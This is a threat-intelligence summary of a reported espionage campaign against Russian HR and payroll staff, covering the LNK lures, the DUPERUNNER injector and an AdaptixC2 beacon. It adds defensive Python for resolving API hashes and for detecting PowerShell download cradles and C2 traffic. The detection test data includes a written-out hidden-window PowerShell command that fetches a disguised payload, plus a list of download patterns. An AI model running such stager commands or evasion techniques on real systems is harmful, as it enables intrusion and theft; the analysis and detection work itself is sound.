Full Report
Contents:
- Introduction
- Key Targets
- Industries Affected
- Geographical Focus
- Infection Chain
- Initial Findings
- Looking into the decoy-document
- Technical Analysis
- Stage 1 – Malicious LNK Script
- Stage 2 – DUPERUNNER Implant
- Stage 3 – AdaptixC2 Beacon
- Infrastructural Artefacts
- Conclusion
- SEQRITE Protection
- IOCs
- MITRE ATT&CK

Introduction: SEQRITE APT-Team have recently uncovered a campaign, which has been targeting Russian […]

The post Operation DupeHike : UNG0902 targets Russian employees with DUPERUNNER and AdaptixC2 appeared first on Blogs on Information Technology, Network & Cybersecurity | Seqrite.
Analysis Summary
# Threat Actor: UNG0902 (Implied)
## Attribution & Identity
The campaign described, "Operation DupeHike," is attributed to the threat actor group **UNG0902** by the SEQRITE APT-Team. The article concentrates on the technical execution of the campaign; beyond naming the group, it does not present attribution evidence linking this activity to historical UNG0902 operations.
## Activity Summary
SEQRITE uncovered a recent campaign targeting Russian corporate entities. The stated objective appears to be espionage or data theft, leveraging highly realistic lures related to internal HR and payroll matters (employee bonuses, financial policies) delivered via spear-phishing.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via malicious ZIP archives containing decoy documents and malicious LNK files.
- **Execution (Initial Stage):** Use of a malicious Shortcut (.LNK file) to execute PowerShell (`powershell.exe`) to download the subsequent stages.
- **Defense Evasion/Masquerading:**
  - LNK file masquerading as a PDF via a double extension (`Документ_1_О_размере_годовой_премии.pdf.lnk`).
  - Payload delivered under a web-font filename so it passes as a font file (`fontawesome.woff`).
  - AdaptixC2 stored as packed shellcode appended behind a specific two-byte magic marker ("EZ").
  - Dynamic API resolution within AdaptixC2 using djb2-style hashing of export names and PEB traversal, so imported API names do not appear in the binary.
- **Implantation/Persistence:** DUPERUNNER implant is used for code injection.
- **Process Injection:** DUPERUNNER injects AdaptixC2 shellcode into legitimate processes such as `explorer.exe`, `notepad.exe`, and `msedge.exe` using Remote Thread Injection (T1055.003, T1055).
- **Loading:** Reflective Code Loading is used by AdaptixC2 to load its payload from appended shellcode (T1620).
- **Discovery:** System Information Discovery (hostname, domain, time, Temp directory) and Process Discovery (T1057, T1082).
- **C2 Communications:** Uses HTTP Application Layer Protocol (T1071.001), employing data encoding (T1132) and encryption (T1573). May use raw TCP (T1095).
- **Exfiltration:** Data Exfiltration (T1537) over the C2 channel (T1041), sending encoded results to the `/result` endpoint via POST.
**MITRE ATT&CK Mappings Observed:** T1036, T1027, T1027.007, T1055.003, T1620, T1082, T1057, T1071.001, T1132, T1095, T1573, T1055, T1113/T1005, T1041, T1537.
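Two of the evasion traits above, hashed API resolution and the "EZ" payload marker, are the kind of thing an analyst wants to check quickly during triage. The following is an added example written for this summary; it is not code from Seqrite or from the sample. It assumes the hash is classic djb2 (seed 5381, `h = h*33 + c`) over the ASCII export name truncated to 32 bits, since the report does not state the exact variant (seed and multiplier are therefore parameters), and it assumes the packed shellcode directly follows the two marker bytes. The export list and the "unknown constants" are constructed for the demonstration.

```python
"""Analyst helpers for two AdaptixC2 traits: djb2-style API hashing and the
"EZ" payload marker. Added example, not Seqrite's or the sample's code.
Assumptions: classic djb2 (seed 5381, h = h*33 + c) over ASCII names,
32-bit truncated; the report does not give the variant, so seed and
multiplier are parameters. The marker helper assumes the payload directly
follows the two marker bytes."""
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF

# Exports an injector/beacon typically resolves. For a real table, feed the
# full export list dumped from kernel32.dll / ntdll.dll instead.
COMMON_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateRemoteThread", "WriteProcessMemory", "OpenProcess",
    "GetComputerNameA", "GetTempPathA", "CreateProcessA",
]


def djb2(name: str, seed: int = 5381, multiplier: int = 33) -> int:
    """Classic djb2 over the ASCII bytes of an export name, 32-bit truncated."""
    h = seed
    for b in name.encode("ascii"):
        h = (h * multiplier + b) & MASK32
    return h


def build_hash_table(names: Iterable[str], **params) -> Dict[int, str]:
    """Precompute hash -> name so constants seen in a sample can be resolved."""
    return {djb2(n, **params): n for n in names}


def resolve_hashes(constants: Iterable[int],
                   table: Dict[int, str]) -> List[Tuple[int, Optional[str]]]:
    """Map each 32-bit constant to a name, or None if it is not in the table."""
    return [(c & MASK32, table.get(c & MASK32)) for c in constants]


def find_appended_payload(blob: bytes, marker: bytes = b"EZ",
                          start_at: int = 0) -> Optional[Tuple[int, bytes]]:
    """Return (offset, bytes) of the data after the first marker found at or
    after start_at, or None. Two marker bytes can occur by chance inside
    legitimate code, so in practice start_at should be the end of the last
    PE section (the overlay start) rather than 0."""
    idx = blob.find(marker, start_at)
    if idx == -1:
        return None
    start = idx + len(marker)
    return start, blob[start:]


# Constructed inputs: the constants are derived from the table itself (plus
# one deliberately unknown value); none are taken from the real sample.
SAMPLE_CONSTANTS = [djb2("VirtualAlloc"), djb2("CreateRemoteThread"), 0xDEADBEEF]
SAMPLE_BLOB = b"MZ\x90\x00" + b"EZ" + b"\x41\x42\x43"


def demo() -> Tuple[List[Tuple[int, Optional[str]]], Optional[Tuple[int, bytes]]]:
    """Resolve the constructed constants and locate the constructed payload."""
    table = build_hash_table(COMMON_EXPORTS)
    return resolve_hashes(SAMPLE_CONSTANTS, table), find_appended_payload(SAMPLE_BLOB)


if __name__ == "__main__":
    resolved, payload = demo()
    for h, name in resolved:
        print(f"0x{h:08x} -> {name or '<unresolved>'}")
    print("appended payload:", payload)
```

When a sample's hash constants do not resolve against the classic parameters, the usual next step is to vary the seed and multiplier (or the case-folding of the name) until known exports such as `LoadLibraryA` line up; once the variant is known, the same table doubles as a source of constants for YARA rules.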
## Targeting
- **Sectors:** Corporate Sector, specifically Human Resources & Payroll departments.
- **Geography:** Russian Federation.
- **Victims:** Russian corporate entities (specific organizations not named in the provided text, but the focus is internal administrative functions).
- **Lure Context:** Decoy documents centered on simulating official internal HR procedures for annual bonuses, salary payments, and internal financial policies.
## Tools & Infrastructure
- **Malware Families Used:**
  - **DUPERUNNER:** The initial implant (name tracked by SEQRITE), downloaded via PowerShell and used to perform process injection.
  - **AdaptixC2 Beacon:** The final-stage beacon loaded by DUPERUNNER for command and control.
- **Infrastructure:**
  - Initial download source IP address identified: `46.149.71.230` (used for downloading the decoy and the beacon via HTTP GET).
  - C2 endpoint path: `/result` (used for exfiltration POST requests).
## Implications
The actor demonstrates a high degree of tradecraft, utilizing multi-stage infection chains, custom malware (DUPERUNNER, AdaptixC2), and heavy obfuscation/process injection techniques to maintain persistence and evade detection while targeting sensitive internal corporate functions in Russia. The use of highly relevant HR/payroll lures suggests a targeted espionage or data theft mission focused on gaining insider-level access.
## Mitigations
- Implement robust email gateway filtering to block malicious ZIP/LNK file extensions if possible, or scan archived content rigorously.
- Monitor for unusual execution of `powershell.exe` that downloads external content, especially command lines involving `Invoke-WebRequest` or similar download cmdlets.
- Deploy Endpoint Detection and Response (EDR) solutions capable of detecting process injection techniques (T1055) and reflective loading (T1620) into legitimate processes like `explorer.exe`.
- Profile network traffic for connections to known suspicious IPs and look for suspicious HTTP GET/POST requests associated with C2 communication patterns.
- Enhance monitoring of internal administrative systems, especially HR and payroll databases, for anomalous file access or data exfiltration attempts.
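The PowerShell and network mitigations above are straightforward to express as detection logic. The block below is an added example for this summary, not Seqrite's detection content. It models process-creation events with the fields Sysmon Event ID 1 or an EDR would provide (`Image`, `ParentImage`, `CommandLine`) and HTTP events as a proxy log would record them; only the IP `46.149.71.230` and the `/result` path come from the report, and every sample event, hostname and URL is constructed.

```python
"""Detection logic for the PowerShell-download and C2-traffic mitigations.
Added example, not Seqrite's detection content. Event dicts mimic Sysmon
Event ID 1 fields (Image, ParentImage, CommandLine) and a proxy log
(method, dst_ip, path). Only IOC_IPS and C2_PATHS come from the report;
the sample events are constructed."""
import re
from typing import Dict, List

IOC_IPS = {"46.149.71.230"}   # download/C2 address from the report
C2_PATHS = {"/result"}        # exfiltration endpoint from the report

# Download primitives commonly reached from a one-line PowerShell stager.
DOWNLOAD_PATTERN = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|"
    r"downloadfile|start-bitstransfer|net\.webclient)", re.IGNORECASE)
URL_PATTERN = re.compile(r"https?://", re.IGNORECASE)
# Flags that typically accompany a shortcut-launched stager.
STEALTH_PATTERN = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-enc\b)",
    re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process_event(ev: Dict[str, str]) -> List[str]:
    """Reasons to flag a process event; empty list means no finding.
    A download cradle is the trigger; an explorer.exe parent (LNK or
    archive double-click) and stealth flags raise the confidence."""
    reasons: List[str] = []
    if image_name(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return reasons
    cmd = ev.get("CommandLine", "")
    if DOWNLOAD_PATTERN.search(cmd) and URL_PATTERN.search(cmd):
        reasons.append("powershell download cradle")
        if image_name(ev.get("ParentImage", "")) == "explorer.exe":
            reasons.append("spawned from explorer.exe (shortcut/archive launch)")
        if STEALTH_PATTERN.search(cmd):
            reasons.append("hidden-window / no-profile flags")
    return reasons


def check_http_event(ev: Dict[str, str]) -> List[str]:
    """Reasons to flag an HTTP event: known IOC address or C2 result POST."""
    reasons: List[str] = []
    if ev.get("dst_ip") in IOC_IPS:
        reasons.append(f"destination {ev['dst_ip']} is a known IOC")
    if ev.get("method") == "POST" and ev.get("path") in C2_PATHS:
        reasons.append(f"POST to C2 result endpoint {ev['path']}")
    return reasons


def evaluate(process_events: List[Dict[str, str]],
             http_events: List[Dict[str, str]]) -> List[Dict]:
    """Run both rule sets and return one finding per flagged event."""
    findings: List[Dict] = []
    for ev in process_events:
        r = check_process_event(ev)
        if r:
            findings.append({"source": "process", "event": ev, "reasons": r})
    for ev in http_events:
        r = check_http_event(ev)
        if r:
            findings.append({"source": "http", "event": ev, "reasons": r})
    return findings


# Constructed sample events (TEST-NET addresses and example hostnames).
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://198.51.100.10/fontawesome.woff -OutFile $env:TEMP\fontawesome.woff"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Invoke-WebRequest https://updates.example.internal/agent.msi -OutFile C:\Temp\agent.msi"'},
]
SAMPLE_HTTP_EVENTS = [
    {"method": "POST", "dst_ip": "46.149.71.230", "path": "/result"},
    {"method": "GET", "dst_ip": "203.0.113.5", "path": "/index.html"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_PROCESS_EVENTS, SAMPLE_HTTP_EVENTS):
        print(f["source"], "->", "; ".join(f["reasons"]))
```

The third process event shows why the rules return reasons rather than a bare boolean: a legitimate admin script that fetches an installer still matches the download cradle, but lacks the explorer.exe parent, so an analyst can route it to a lower-severity queue instead of suppressing the rule outright.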